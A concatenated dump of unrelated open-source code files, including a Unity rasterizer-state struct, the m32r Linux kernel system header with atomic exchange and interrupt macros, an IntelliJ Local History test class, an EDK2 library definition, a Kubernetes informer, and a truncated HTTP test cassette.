  public String getCondition() {
    return condition;
  }

  public void setCondition(final String condition) {
    this.condition = condition;
  }

  public String getNext() {
    return next;
  }

  public void setNext(final String next) {
    this.next = next;
  }

  public String getDefaultCase() {
    return defaultCase;
  }

  public void setDefaultCase(final String defaultCase) {
    this.defaultCase = defaultCase;
  }
}
| {
"pile_set_name": "Github"
} |
// Prints the literal string 'bar' to stdout (presumably a test fixture — confirm).
console.log('bar');
| {
"pile_set_name": "Github"
} |
// Unity C# reference source
// Copyright (c) Unity Technologies. For terms of use, see
// https://unity3d.com/legal/licenses/Unity_Reference_Only_License
using System;
using System.Runtime.InteropServices;
using UnityEngine.Rendering;
namespace UnityEngine.Rendering
{
// Must match GfxRasterState on C++ side
/// <summary>
/// Fixed-function rasterizer state: face culling, depth offset (bias),
/// depth clip and a conservative-rasterization flag. Declared
/// LayoutKind.Sequential because the struct must mirror GfxRasterState on
/// the C++ side (see comment above); do not reorder, add or resize fields
/// without updating the native struct.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct RasterState : IEquatable<RasterState>
{
    // Passing a single parameter here to force non-default constructor
    public static readonly RasterState defaultValue = new RasterState(CullMode.Back);

    /// <summary>Creates a rasterizer state description.</summary>
    /// <param name="cullingMode">Which triangle faces are culled.</param>
    /// <param name="offsetUnits">Constant depth-offset component (semantics defined by the native rasterizer).</param>
    /// <param name="offsetFactor">Slope-scaled depth-offset component.</param>
    /// <param name="depthClip">Enables depth clipping.</param>
    public RasterState(
        CullMode cullingMode = CullMode.Back,
        int offsetUnits = 0,
        float offsetFactor = 0f,
        bool depthClip = true)
    {
        m_CullingMode = cullingMode;
        m_OffsetUnits = offsetUnits;
        m_OffsetFactor = offsetFactor;
        // bools are stored as single bytes so the sequential layout has a
        // fixed size that matches the native struct
        m_DepthClip = Convert.ToByte(depthClip);
        m_Conservative = Convert.ToByte(false); // not settable via constructor
        m_Padding1 = 0;
        m_Padding2 = 0;
    }

    /// <summary>Which triangle faces are culled.</summary>
    public CullMode cullingMode
    {
        get { return m_CullingMode; }
        set { m_CullingMode = value; }
    }

    /// <summary>Whether depth clipping is enabled.</summary>
    public bool depthClip
    {
        get { return Convert.ToBoolean(m_DepthClip); }
        set { m_DepthClip = Convert.ToByte(value); }
    }

    /// <summary>Conservative flag — presumably conservative rasterization;
    /// confirm exact semantics against GfxRasterState.</summary>
    public bool conservative
    {
        get { return Convert.ToBoolean(m_Conservative); }
        set { m_Conservative = Convert.ToByte(value); }
    }

    /// <summary>Constant depth-offset component.</summary>
    public int offsetUnits
    {
        get { return m_OffsetUnits; }
        set { m_OffsetUnits = value; }
    }

    /// <summary>Slope-scaled depth-offset component.</summary>
    public float offsetFactor
    {
        get { return m_OffsetFactor; }
        set { m_OffsetFactor = value; }
    }

    // Field order defines the native layout; keep in sync with GfxRasterState.
    CullMode m_CullingMode;
    int m_OffsetUnits;
    float m_OffsetFactor;
    byte m_DepthClip;     // bool stored as byte (fixed-size layout)
    byte m_Conservative;  // bool stored as byte (fixed-size layout)
    byte m_Padding1;      // explicit padding, always zero
    byte m_Padding2;      // explicit padding, always zero

    /// <summary>Value equality; the padding bytes are deliberately ignored.</summary>
    public bool Equals(RasterState other)
    {
        return m_CullingMode == other.m_CullingMode && m_OffsetUnits == other.m_OffsetUnits && m_OffsetFactor.Equals(other.m_OffsetFactor) && m_DepthClip == other.m_DepthClip && m_Conservative == other.m_Conservative;
    }

    public override bool Equals(object obj)
    {
        if (ReferenceEquals(null, obj)) return false;
        return obj is RasterState && Equals((RasterState)obj);
    }

    /// <summary>Hash over the same fields Equals() compares (padding excluded).</summary>
    public override int GetHashCode()
    {
        unchecked
        {
            var hashCode = (int)m_CullingMode;
            hashCode = (hashCode * 397) ^ m_OffsetUnits;
            hashCode = (hashCode * 397) ^ m_OffsetFactor.GetHashCode();
            hashCode = (hashCode * 397) ^ m_DepthClip.GetHashCode();
            hashCode = (hashCode * 397) ^ m_Conservative.GetHashCode();
            return hashCode;
        }
    }

    public static bool operator==(RasterState left, RasterState right)
    {
        return left.Equals(right);
    }

    public static bool operator!=(RasterState left, RasterState right)
    {
        return !left.Equals(right);
    }
}
}
| {
"pile_set_name": "Github"
} |
#ifndef _ASM_M32R_SYSTEM_H
#define _ASM_M32R_SYSTEM_H
/*
* This file is subject to the terms and conditions of the GNU General Public
* License. See the file "COPYING" in the main directory of this archive
* for more details.
*
* Copyright (C) 2001 Hiroyuki Kondo, Hirokazu Takata, and Hitoshi Yamamoto
* Copyright (C) 2004, 2006 Hirokazu Takata <takata at linux-m32r.org>
*/
#include <linux/compiler.h>
#include <asm/assembler.h>
#ifdef __KERNEL__
/*
* switch_to(prev, next) should switch from task `prev' to `next'
* `prev' will never be the same as `next'.
*
* `next' and `prev' should be struct task_struct, but it isn't always defined
*/
#if defined(CONFIG_FRAME_POINTER) || !defined(CONFIG_SCHED_OMIT_FRAME_POINTER)
#define M32R_PUSH_FP " push fp\n"
#define M32R_POP_FP " pop fp\n"
#else
#define M32R_PUSH_FP ""
#define M32R_POP_FP ""
#endif
#define switch_to(prev, next, last) do { \
__asm__ __volatile__ ( \
" seth lr, #high(1f) \n" \
" or3 lr, lr, #low(1f) \n" \
" st lr, @%4 ; store old LR \n" \
" ld lr, @%5 ; load new LR \n" \
M32R_PUSH_FP \
" st sp, @%2 ; store old SP \n" \
" ld sp, @%3 ; load new SP \n" \
" push %1 ; store `prev' on new stack \n" \
" jmp lr \n" \
" .fillinsn \n" \
"1: \n" \
" pop %0 ; restore `__last' from new stack \n" \
M32R_POP_FP \
: "=r" (last) \
: "0" (prev), \
"r" (&(prev->thread.sp)), "r" (&(next->thread.sp)), \
"r" (&(prev->thread.lr)), "r" (&(next->thread.lr)) \
: "memory", "lr" \
); \
} while(0)
/* Interrupt Control */
#if !defined(CONFIG_CHIP_M32102) && !defined(CONFIG_CHIP_M32104)
#define local_irq_enable() \
__asm__ __volatile__ ("setpsw #0x40 -> nop": : :"memory")
#define local_irq_disable() \
__asm__ __volatile__ ("clrpsw #0x40 -> nop": : :"memory")
#else /* CONFIG_CHIP_M32102 || CONFIG_CHIP_M32104 */
static inline void local_irq_enable(void)
{
unsigned long tmpreg;
__asm__ __volatile__(
"mvfc %0, psw; \n\t"
"or3 %0, %0, #0x0040; \n\t"
"mvtc %0, psw; \n\t"
: "=&r" (tmpreg) : : "cbit", "memory");
}
static inline void local_irq_disable(void)
{
unsigned long tmpreg0, tmpreg1;
__asm__ __volatile__(
"ld24 %0, #0 ; Use 32-bit insn. \n\t"
"mvfc %1, psw ; No interrupt can be accepted here. \n\t"
"mvtc %0, psw \n\t"
"and3 %0, %1, #0xffbf \n\t"
"mvtc %0, psw \n\t"
: "=&r" (tmpreg0), "=&r" (tmpreg1) : : "cbit", "memory");
}
#endif /* CONFIG_CHIP_M32102 || CONFIG_CHIP_M32104 */
#define local_save_flags(x) \
__asm__ __volatile__("mvfc %0,psw" : "=r"(x) : /* no input */)
#define local_irq_restore(x) \
__asm__ __volatile__("mvtc %0,psw" : /* no outputs */ \
: "r" (x) : "cbit", "memory")
#if !(defined(CONFIG_CHIP_M32102) || defined(CONFIG_CHIP_M32104))
#define local_irq_save(x) \
__asm__ __volatile__( \
"mvfc %0, psw; \n\t" \
"clrpsw #0x40 -> nop; \n\t" \
: "=r" (x) : /* no input */ : "memory")
#else /* CONFIG_CHIP_M32102 || CONFIG_CHIP_M32104 */
#define local_irq_save(x) \
({ \
unsigned long tmpreg; \
__asm__ __volatile__( \
"ld24 %1, #0 \n\t" \
"mvfc %0, psw \n\t" \
"mvtc %1, psw \n\t" \
"and3 %1, %0, #0xffbf \n\t" \
"mvtc %1, psw \n\t" \
: "=r" (x), "=&r" (tmpreg) \
: : "cbit", "memory"); \
})
#endif /* CONFIG_CHIP_M32102 || CONFIG_CHIP_M32104 */
#define irqs_disabled() \
({ \
unsigned long flags; \
local_save_flags(flags); \
!(flags & 0x40); \
})
#define nop() __asm__ __volatile__ ("nop" : : )
#define xchg(ptr, x) \
((__typeof__(*(ptr)))__xchg((unsigned long)(x), (ptr), sizeof(*(ptr))))
#define xchg_local(ptr, x) \
((__typeof__(*(ptr)))__xchg_local((unsigned long)(x), (ptr), \
sizeof(*(ptr))))
extern void __xchg_called_with_bad_pointer(void);
#ifdef CONFIG_CHIP_M32700_TS1
#define DCACHE_CLEAR(reg0, reg1, addr) \
"seth "reg1", #high(dcache_dummy); \n\t" \
"or3 "reg1", "reg1", #low(dcache_dummy); \n\t" \
"lock "reg0", @"reg1"; \n\t" \
"add3 "reg0", "addr", #0x1000; \n\t" \
"ld "reg0", @"reg0"; \n\t" \
"add3 "reg0", "addr", #0x2000; \n\t" \
"ld "reg0", @"reg0"; \n\t" \
"unlock "reg0", @"reg1"; \n\t"
#else /* CONFIG_CHIP_M32700_TS1 */
#define DCACHE_CLEAR(reg0, reg1, addr)
#endif /* CONFIG_CHIP_M32700_TS1 */
/*
 * __xchg - atomically exchange *ptr with x and return the previous value.
 *
 * @x:    new value to store
 * @ptr:  target location (1, 2 or 4 bytes on UP; 4 bytes only on SMP)
 * @size: operand width in bytes, supplied by the xchg() wrapper macro
 *
 * On UP, disabling interrupts is enough to make the load/store pair atomic.
 * On SMP, the 32-bit case uses the m32r LOCK/UNLOCK instruction pair.
 * Unsupported sizes call __xchg_called_with_bad_pointer(), which is left
 * undefined so the build fails at link time (same idiom as
 * __cmpxchg_called_with_bad_pointer below).
 */
static __always_inline unsigned long
__xchg(unsigned long x, volatile void *ptr, int size)
{
	unsigned long flags;
	unsigned long tmp = 0;

	local_irq_save(flags);	/* no interrupt between the load and the store */
	switch (size) {
#ifndef CONFIG_SMP
	case 1:
		__asm__ __volatile__ (
			"ldb %0, @%2 \n\t"
			"stb %1, @%2 \n\t"
			: "=&r" (tmp) : "r" (x), "r" (ptr) : "memory");
		break;
	case 2:
		__asm__ __volatile__ (
			"ldh %0, @%2 \n\t"
			"sth %1, @%2 \n\t"
			: "=&r" (tmp) : "r" (x), "r" (ptr) : "memory");
		break;
	case 4:
		__asm__ __volatile__ (
			"ld %0, @%2 \n\t"
			"st %1, @%2 \n\t"
			: "=&r" (tmp) : "r" (x), "r" (ptr) : "memory");
		break;
#else  /* CONFIG_SMP */
	case 4:
		__asm__ __volatile__ (
			/* DCACHE_CLEAR is a cache workaround for M32700 TS1 */
			DCACHE_CLEAR("%0", "r4", "%2")
			"lock %0, @%2; \n\t"
			"unlock %1, @%2; \n\t"
			: "=&r" (tmp) : "r" (x), "r" (ptr)
			: "memory"
#ifdef CONFIG_CHIP_M32700_TS1
			, "r4"
#endif /* CONFIG_CHIP_M32700_TS1 */
		);
		break;
#endif  /* CONFIG_SMP */
	default:
		__xchg_called_with_bad_pointer();
	}
	local_irq_restore(flags);
	return (tmp);
}
/*
 * __xchg_local - exchange *ptr with x, visible to this CPU only.
 *
 * Same operation as __xchg() but without the SMP LOCK/UNLOCK sequence:
 * only interrupts are disabled, so this is safe only for data that other
 * CPUs never access concurrently (the cmpxchg_local/xchg_local contract).
 */
static __always_inline unsigned long
__xchg_local(unsigned long x, volatile void *ptr, int size)
{
	unsigned long flags;
	unsigned long tmp = 0;

	local_irq_save(flags);
	switch (size) {
	case 1:
		__asm__ __volatile__ (
			"ldb %0, @%2 \n\t"
			"stb %1, @%2 \n\t"
			: "=&r" (tmp) : "r" (x), "r" (ptr) : "memory");
		break;
	case 2:
		__asm__ __volatile__ (
			"ldh %0, @%2 \n\t"
			"sth %1, @%2 \n\t"
			: "=&r" (tmp) : "r" (x), "r" (ptr) : "memory");
		break;
	case 4:
		__asm__ __volatile__ (
			"ld %0, @%2 \n\t"
			"st %1, @%2 \n\t"
			: "=&r" (tmp) : "r" (x), "r" (ptr) : "memory");
		break;
	default:
		__xchg_called_with_bad_pointer();	/* link error for bad sizes */
	}
	local_irq_restore(flags);
	return (tmp);
}
#define __HAVE_ARCH_CMPXCHG 1
/*
 * __cmpxchg_u32 - atomic 32-bit compare-and-swap.
 *
 * Loads *p with the LOCK instruction; if the loaded value equals @old the
 * asm stores @new via UNLOCK, otherwise it UNLOCK-stores the loaded value
 * back unchanged (releasing the lock without modifying memory). Returns
 * the value that was read, so callers detect success by
 * (return value == old). Interrupts are disabled around the sequence.
 */
static inline unsigned long
__cmpxchg_u32(volatile unsigned int *p, unsigned int old, unsigned int new)
{
	unsigned long flags;
	unsigned int retval;

	local_irq_save(flags);
	__asm__ __volatile__ (
			/* DCACHE_CLEAR is a cache workaround for M32700 TS1 */
			DCACHE_CLEAR("%0", "r4", "%1")
			M32R_LOCK" %0, @%1; \n"
		" bne %0, %2, 1f; \n"
			M32R_UNLOCK" %3, @%1; \n"
		" bra 2f; \n"
		" .fillinsn \n"
		"1:"
			M32R_UNLOCK" %0, @%1; \n"
		" .fillinsn \n"
		"2:"
			: "=&r" (retval)
			: "r" (p), "r" (old), "r" (new)
			: "cbit", "memory"
#ifdef CONFIG_CHIP_M32700_TS1
			, "r4"
#endif /* CONFIG_CHIP_M32700_TS1 */
	);
	local_irq_restore(flags);
	return retval;
}
/*
 * __cmpxchg_local_u32 - 32-bit compare-and-swap, this CPU only.
 *
 * Same return contract as __cmpxchg_u32() but implemented with plain ld/st
 * under disabled interrupts (no LOCK/UNLOCK), so it is not SMP-safe and
 * must only be used on data private to the current CPU.
 */
static inline unsigned long
__cmpxchg_local_u32(volatile unsigned int *p, unsigned int old,
			unsigned int new)
{
	unsigned long flags;
	unsigned int retval;

	local_irq_save(flags);
	__asm__ __volatile__ (
			DCACHE_CLEAR("%0", "r4", "%1")
			"ld %0, @%1; \n"
		" bne %0, %2, 1f; \n"
			"st %3, @%1; \n"
		" bra 2f; \n"
		" .fillinsn \n"
		"1:"
			"st %0, @%1; \n"	/* miss path: rewrite the value read */
		" .fillinsn \n"
		"2:"
			: "=&r" (retval)
			: "r" (p), "r" (old), "r" (new)
			: "cbit", "memory"
#ifdef CONFIG_CHIP_M32700_TS1
			, "r4"
#endif /* CONFIG_CHIP_M32700_TS1 */
	);
	local_irq_restore(flags);
	return retval;
}
/* This function doesn't exist, so you'll get a linker error
if something tries to do an invalid cmpxchg(). */
extern void __cmpxchg_called_with_bad_pointer(void);
/*
 * __cmpxchg - size-dispatching front end for the cmpxchg() macro.
 *
 * Only 32-bit operands have a native implementation on m32r; any other
 * size resolves to __cmpxchg_called_with_bad_pointer(), which is
 * deliberately undefined so the build fails at link time (see the comment
 * above its declaration).
 */
static inline unsigned long
__cmpxchg(volatile void *ptr, unsigned long old, unsigned long new, int size)
{
	if (size == 4)
		return __cmpxchg_u32(ptr, old, new);

	/* unsupported width: force a link-time error */
	__cmpxchg_called_with_bad_pointer();
	return old;
}
#define cmpxchg(ptr, o, n) \
((__typeof__(*(ptr))) __cmpxchg((ptr), (unsigned long)(o), \
(unsigned long)(n), sizeof(*(ptr))))
#include <asm-generic/cmpxchg-local.h>
/*
 * __cmpxchg_local - size-dispatching front end for cmpxchg_local().
 *
 * 32-bit operands use the native this-CPU implementation; every other
 * size falls back to the generic interrupt-disabling helper from
 * <asm-generic/cmpxchg-local.h>.
 */
static inline unsigned long __cmpxchg_local(volatile void *ptr,
				       unsigned long old,
				       unsigned long new, int size)
{
	if (size == 4)
		return __cmpxchg_local_u32(ptr, old, new);

	return __cmpxchg_local_generic(ptr, old, new, size);
}
/*
* cmpxchg_local and cmpxchg64_local are atomic wrt current CPU. Always make
* them available.
*/
#define cmpxchg_local(ptr, o, n) \
((__typeof__(*(ptr)))__cmpxchg_local((ptr), (unsigned long)(o), \
(unsigned long)(n), sizeof(*(ptr))))
#define cmpxchg64_local(ptr, o, n) __cmpxchg64_local_generic((ptr), (o), (n))
#endif /* __KERNEL__ */
/*
* Memory barrier.
*
* mb() prevents loads and stores being reordered across this point.
* rmb() prevents loads being reordered across this point.
* wmb() prevents stores being reordered across this point.
*/
#define mb() barrier()
#define rmb() mb()
#define wmb() mb()
/**
* read_barrier_depends - Flush all pending reads that subsequents reads
* depend on.
*
* No data-dependent reads from memory-like regions are ever reordered
* over this barrier. All reads preceding this primitive are guaranteed
* to access memory (but not necessarily other CPUs' caches) before any
* reads following this primitive that depend on the data return by
* any of the preceding reads. This primitive is much lighter weight than
* rmb() on most CPUs, and is never heavier weight than is
* rmb().
*
* These ordering constraints are respected by both the local CPU
* and the compiler.
*
* Ordering is not guaranteed by anything other than these primitives,
* not even by data dependencies. See the documentation for
* memory_barrier() for examples and URLs to more information.
*
* For example, the following code would force ordering (the initial
* value of "a" is zero, "b" is one, and "p" is "&a"):
*
* <programlisting>
* CPU 0 CPU 1
*
* b = 2;
* memory_barrier();
* p = &b; q = p;
* read_barrier_depends();
* d = *q;
* </programlisting>
*
*
* because the read of "*q" depends on the read of "p" and these
* two reads are separated by a read_barrier_depends(). However,
* the following code, with the same initial values for "a" and "b":
*
* <programlisting>
* CPU 0 CPU 1
*
* a = 2;
* memory_barrier();
* b = 3; y = b;
* read_barrier_depends();
* x = a;
* </programlisting>
*
* does not enforce ordering, since there is no data dependency between
* the read of "a" and the read of "b". Therefore, on some CPUs, such
* as Alpha, "y" could be set to 3 and "x" to 0. Use rmb()
* in cases like this where there are no data dependencies.
**/
#define read_barrier_depends() do { } while (0)
#ifdef CONFIG_SMP
#define smp_mb() mb()
#define smp_rmb() rmb()
#define smp_wmb() wmb()
#define smp_read_barrier_depends() read_barrier_depends()
#define set_mb(var, value) do { (void) xchg(&var, value); } while (0)
#else
#define smp_mb() barrier()
#define smp_rmb() barrier()
#define smp_wmb() barrier()
#define smp_read_barrier_depends() do { } while (0)
#define set_mb(var, value) do { var = value; barrier(); } while (0)
#endif
#define arch_align_stack(x) (x)
#endif /* _ASM_M32R_SYSTEM_H */
| {
"pile_set_name": "Github"
} |
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.history.integration;
import com.intellij.history.LocalHistory;
import com.intellij.history.core.revisions.Revision;
import com.intellij.history.utils.RunnableAdapter;
import com.intellij.openapi.application.ApplicationManager;
import com.intellij.openapi.command.CommandProcessor;
import com.intellij.openapi.util.ThrowableComputable;
import com.intellij.openapi.vfs.JarFileSystem;
import com.intellij.openapi.vfs.LocalFileSystem;
import com.intellij.openapi.vfs.VirtualFile;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.jar.JarEntry;
import java.util.jar.JarOutputStream;
import static org.assertj.core.api.Assertions.assertThat;
/**
 * Integration tests for basic Local History behavior: revision grouping for
 * commands, user and system labels, interaction with unsaved document text,
 * and which files are tracked at all.
 */
public class BasicsTest extends IntegrationTestCase {

  // All VFS changes performed inside a single command are recorded as one change.
  public void testProcessingCommands() {
    final VirtualFile[] f = new VirtualFile[1];
    ApplicationManager.getApplication().runWriteAction(() -> CommandProcessor.getInstance().executeCommand(myProject, new RunnableAdapter() {
      @Override
      public void doRun() throws IOException {
        f[0] = createChildData(myRoot, "f1.txt");
        f[0].setBinaryContent(new byte[]{1});
        f[0].setBinaryContent(new byte[]{2});
      }
    }, "name", null));
    // creation + both content writes collapse into 2 revisions, not 3
    assertThat(getRevisionsFor(f[0])).hasSize(2);
  }

  // Each user label adds one revision to the file and to its parent directory.
  public void testPuttingUserLabel() {
    VirtualFile f = createChildData(myRoot, "f.txt");
    LocalHistory.getInstance().putUserLabel(myProject, "global");
    assertEquals(3, getRevisionsFor(f).size());
    assertThat(getRevisionsFor(myRoot)).hasSize(4);
    LocalHistory.getInstance().putUserLabel(myProject, "file");
    List<Revision> rr = getRevisionsFor(f);
    assertEquals(4, rr.size());
    // labels are ordered newest-first after the current revision;
    // labelColor is -1 here (presumably "no explicit color" — confirm)
    assertEquals("file", rr.get(1).getLabel());
    assertEquals(-1, rr.get(1).getLabelColor());
    assertEquals("global", rr.get(2).getLabel());
    assertEquals(-1, rr.get(2).getLabelColor());
  }

  // A system label likewise creates one extra revision on the file and the root.
  public void testPuttingSystemLabel() {
    VirtualFile f = createChildData(myRoot, "file.txt");
    assertEquals(2, getRevisionsFor(f).size());
    assertEquals(3, getRevisionsFor(myRoot).size());
    LocalHistory.getInstance().putSystemLabel(myProject, "label");
    List<Revision> rr = getRevisionsFor(f);
    assertEquals(3, rr.size());
    assertEquals("label", rr.get(1).getLabel());
    rr = getRevisionsFor(myRoot);
    assertEquals(4, rr.size());
    assertEquals("label", rr.get(1).getLabel());
  }

  // Labels must snapshot the current *unsaved* document text, once per change.
  public void testPuttingLabelWithUnsavedDocuments() {
    VirtualFile f = createChildData(myRoot, "f.txt");
    setContent(f, "1");
    setDocumentTextFor(f, "2");
    LocalHistory.getInstance().putSystemLabel(myProject, "label");
    setDocumentTextFor(f, "3");
    LocalHistory.getInstance().putUserLabel(myProject, "label");
    setDocumentTextFor(f, "4");
    LocalHistory.getInstance().putUserLabel(myProject, "label");
    List<Revision> rr = getRevisionsFor(f);
    assertEquals(9, rr.size()); // 5 changes + 3 labels
    assertEquals("4", new String(rr.get(0).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
    assertEquals("4", new String(rr.get(1).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
    assertEquals("3", new String(rr.get(2).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
    assertEquals("3", new String(rr.get(3).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
    assertEquals("2", new String(rr.get(4).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
    assertEquals("2", new String(rr.get(5).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
    assertEquals("1", new String(rr.get(6).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
    assertEquals("", new String(rr.get(7).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
  }

  // Labeling twice without intervening edits must not snapshot the same text twice.
  public void testDoNotRegisterSameUnsavedDocumentContentTwice() {
    VirtualFile f = createChildData(myRoot, "f.txt");
    setContent(f, "1");
    setDocumentTextFor(f, "2");
    LocalHistory.getInstance().putSystemLabel(myProject, "label");
    LocalHistory.getInstance().putUserLabel(myProject, "label");
    List<Revision> rr = getRevisionsFor(f);
    assertEquals(6, rr.size()); // 3 changes + 2 labels
    assertEquals("2", new String(rr.get(0).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
    assertEquals("2", new String(rr.get(1).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
    assertEquals("2", new String(rr.get(2).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
    assertEquals("1", new String(rr.get(3).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
    assertEquals("", new String(rr.get(4).findEntry().getContent().getBytes(), StandardCharsets.UTF_8));
  }

  // Files with an ignored extension are excluded from Local History.
  public void testIsUnderControl() {
    VirtualFile f1 = createChildData(myRoot, "file.txt");
    VirtualFile f2 = createChildData(myRoot, "file." + FileListeningTest.IGNORED_EXTENSION);
    assertTrue(LocalHistory.getInstance().isUnderControl(f1));
    assertFalse(LocalHistory.getInstance().isUnderControl(f2));
  }

  // Changes inside a jar (non-local file system) must not produce new revisions.
  public void testDoNotRegisterChangesNotInLocalFS() throws Exception {
    File f = new File(myRoot.getPath(), "f.jar");
    // create f.jar containing file.txt whose content is the single byte 1
    ApplicationManager.getApplication().runWriteAction((ThrowableComputable<Object, IOException>)() -> {
      try (JarOutputStream jar = new JarOutputStream(new FileOutputStream(f))) {
        jar.putNextEntry(new JarEntry("file.txt"));
        jar.write(1);
        jar.closeEntry();
      }
      return null;
    });
    VirtualFile vfile = LocalFileSystem.getInstance().refreshAndFindFileByIoFile(f);
    assertNotNull(vfile);
    VirtualFile jarRoot = JarFileSystem.getInstance().getJarRootForLocalFile(vfile);
    assertEquals(1, jarRoot.findChild("file.txt").contentsToByteArray()[0]);
    assertThat(getRevisionsFor(myRoot)).hasSize(3);
    // rewrite the jar entry (byte 2) with a newer timestamp so refresh notices it
    ApplicationManager.getApplication().runWriteAction((ThrowableComputable<Object, IOException>)() -> {
      try (JarOutputStream jar = new JarOutputStream(new FileOutputStream(f))) {
        JarEntry e = new JarEntry("file.txt");
        e.setTime(f.lastModified() + 10000);
        jar.putNextEntry(e);
        jar.write(2);
        jar.closeEntry();
      }
      f.setLastModified(f.lastModified() + 10000);
      return null;
    });
    LocalFileSystem.getInstance().refreshWithoutFileWatcher(false);
    JarFileSystem.getInstance().refreshWithoutFileWatcher(false);
    jarRoot = JarFileSystem.getInstance().getJarRootForLocalFile(vfile);
    assertThat((int)jarRoot.findChild("file.txt").contentsToByteArray()[0]).isEqualTo(2);
    // revision counts unchanged: jar-internal modifications are not tracked
    assertThat(getRevisionsFor(myRoot)).hasSize(3);
    assertThat(getRevisionsFor(jarRoot)).hasSize(3);
  }
}
| {
"pile_set_name": "Github"
} |
## @file
#
# Stateful, implicitly initialized fw_cfg library.
#
# Copyright (C) 2013, Red Hat, Inc.
# Copyright (c) 2008 - 2012, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2017, AMD Incorporated. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
[Defines]
INF_VERSION = 0x00010005
BASE_NAME = QemuFwCfgPeiLib
FILE_GUID = ddd4f5f0-5304-42a8-9efa-d14bf11a3533
MODULE_TYPE = BASE
VERSION_STRING = 1.0
LIBRARY_CLASS = QemuFwCfgLib|PEIM
CONSTRUCTOR = QemuFwCfgInitialize
#
# The following information is for reference only and not required by the build tools.
#
# VALID_ARCHITECTURES = IA32 X64
#
[Sources]
QemuFwCfgLibInternal.h
QemuFwCfgLib.c
QemuFwCfgPei.c
[Packages]
MdePkg/MdePkg.dec
OvmfPkg/OvmfPkg.dec
[LibraryClasses]
BaseLib
BaseMemoryLib
DebugLib
IoLib
MemoryAllocationLib
MemEncryptSevLib
| {
"pile_set_name": "Github"
} |
ui|cursor {
  display: block;
  position: absolute;
  overflow: visible;
  z-index: 4; /* why this much needed? */
  margin-top: 16px;
  margin-left: 16px;
  /* single authoritative size: the original also declared width/height: 0
     earlier in this rule, but later declarations of equal specificity win,
     so the 0 pair was dead and has been removed */
  width: 24px;
  height: 24px;
  /* parked off-screen initially; presumably repositioned at runtime — confirm */
  top: -100px;
  left: -100px;
}
ui|cursor ui|labelbox.indicator {
position: relative;
top: -10px;
left: 6px;
} | {
"pile_set_name": "Github"
} |
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by informer-gen. DO NOT EDIT.
package v1
import (
"context"
time "time"
appsv1 "k8s.io/api/apps/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
runtime "k8s.io/apimachinery/pkg/runtime"
watch "k8s.io/apimachinery/pkg/watch"
internalinterfaces "k8s.io/client-go/informers/internalinterfaces"
kubernetes "k8s.io/client-go/kubernetes"
v1 "k8s.io/client-go/listers/apps/v1"
cache "k8s.io/client-go/tools/cache"
)
// ReplicaSetInformer provides access to a shared informer and lister for
// ReplicaSets.
type ReplicaSetInformer interface {
Informer() cache.SharedIndexInformer
Lister() v1.ReplicaSetLister
}
type replicaSetInformer struct {
factory internalinterfaces.SharedInformerFactory
tweakListOptions internalinterfaces.TweakListOptionsFunc
namespace string
}
// NewReplicaSetInformer constructs a new informer for ReplicaSet type.
// Always prefer using an informer factory to get a shared informer instead of getting an independent
// one. This reduces memory footprint and number of connections to the server.
func NewReplicaSetInformer(client kubernetes.Interface, namespace string, resyncPeriod time.Duration, indexers cache.Indexers) cache.SharedIndexInformer {
return NewFilteredReplicaSetInformer(client, namespace, resyncPeriod, indexers, nil)
}
// NewFilteredReplicaSetInformer constructs a new informer for ReplicaSet type.
// Always prefer using an informer factory to get a shared informer instead of getting an independent
// one. This reduces memory footprint and number of connections to the server.
func NewFilteredReplicaSetInformer(client kubernetes.Interface, namespace string, resyncPeriod time.Duration, indexers cache.Indexers, tweakListOptions internalinterfaces.TweakListOptionsFunc) cache.SharedIndexInformer {
return cache.NewSharedIndexInformer(
&cache.ListWatch{
ListFunc: func(options metav1.ListOptions) (runtime.Object, error) {
if tweakListOptions != nil {
tweakListOptions(&options)
}
return client.AppsV1().ReplicaSets(namespace).List(context.TODO(), options)
},
WatchFunc: func(options metav1.ListOptions) (watch.Interface, error) {
if tweakListOptions != nil {
tweakListOptions(&options)
}
return client.AppsV1().ReplicaSets(namespace).Watch(context.TODO(), options)
},
},
&appsv1.ReplicaSet{},
resyncPeriod,
indexers,
)
}
func (f *replicaSetInformer) defaultInformer(client kubernetes.Interface, resyncPeriod time.Duration) cache.SharedIndexInformer {
return NewFilteredReplicaSetInformer(client, f.namespace, resyncPeriod, cache.Indexers{cache.NamespaceIndex: cache.MetaNamespaceIndexFunc}, f.tweakListOptions)
}
func (f *replicaSetInformer) Informer() cache.SharedIndexInformer {
return f.factory.InformerFor(&appsv1.ReplicaSet{}, f.defaultInformer)
}
// Lister returns a ReplicaSet lister reading from the shared informer's index.
func (f *replicaSetInformer) Lister() v1.ReplicaSetLister {
	return v1.NewReplicaSetLister(f.Informer().GetIndexer())
}
| {
"pile_set_name": "Github"
} |
interactions:
- request:
body: !!python/unicode "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packet>\n\
\t<site>\n\t\t<get>\n\t\t\t<filter>\n\t\t\t\t<name>lexicon-test.com</name>\n\
\t\t\t</filter>\n\t\t\t<dataset></dataset>\n\t\t</get>\n\t</site>\n</packet>"
headers:
Accept: ['*/*']
